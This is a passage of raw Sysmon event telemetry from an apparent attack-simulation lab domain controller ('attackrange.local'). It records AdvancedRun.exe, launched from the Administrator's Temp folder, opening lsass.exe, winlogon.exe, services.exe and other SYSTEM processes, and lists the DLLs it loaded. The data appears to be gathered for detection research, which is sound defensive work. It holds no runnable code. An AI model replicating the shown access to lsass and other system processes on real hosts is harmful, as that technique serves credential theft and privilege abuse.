ers\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000002968236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAF-61E7-0C00-000000002402}844C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968234Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.709{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0B00-000000002402}628C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968233Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.708{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0A00-000000002402}620C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968232Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.708{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0900-000000002402}568C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968230Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0800-000000002402}492C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968229Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0700-000000002402}484C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968227Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.707{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAD-61E7-0500-000000002402}412C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968226Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.706{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-0200-000000002402}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968225Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.706{834264DD-E081-61E9-0262-000000002402}26487736C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0AAB-61E7-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab6d|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2320|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2590|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000002968204Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.679{834264DD-0AAD-61E7-0B00-000000002402}6285236C:\Windows\system32\lsass.exe{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 734700x80000000000000002968189Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.359{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968160Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.358{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\combase.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=55DECBF64D495E410E82FD446739CA2B,SHA256=B1D480739AB21426FF289E043F9751849BEBA477F3C9E88E5F21F96E16A9B1B0trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968147Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.357{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.352{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968068Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.346{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968062Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.344{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968039Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.342{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002968011Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.340{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967983Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.333{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967955Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.333{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_c58df2c997bddaf8\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=9BA49461346F5B2DAFE81E401E884241,SHA256=297B46C95521B8EB59B3793F0ED2736F39C495D2C3D622638EE9205F53E69EFDtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967896Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.331{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967887Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.330{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967883Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.328{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967868Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.328{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=318804DFF282AE5C2FEF5577057CB913,SHA256=A65C5C3F38A793F0C59C1A4553940D6D236CE2BC3380898E865BF0E1F80FEE8CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967827Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.321{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967802Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.321{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.313{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\userenv.dll10.0.14393.4583 (rs1_release.210730-1850)UserenvMicrosoft® Windows® Operating SystemMicrosoft Corporationuserenv.dllMD5=53FEB2DF5A3001CEE00158E46CF1F1C2,SHA256=9D4DC493975065C4595DB62DCB0828631D9CF6019C9A82AA0384D65A8E6A62C7trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967762Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.309{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=181FE38C3FE164FBFC1A5A8399CCC2DA,SHA256=233C31D9FC1C50A3E0688C1E778D356B419ED4A70D7B6870CA7631E4FE5C2AF9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000002967733Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-20 22:21:53.307{834264DD-E081-61E9-0262-000000002402}2648C:\Users\Administrator\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft 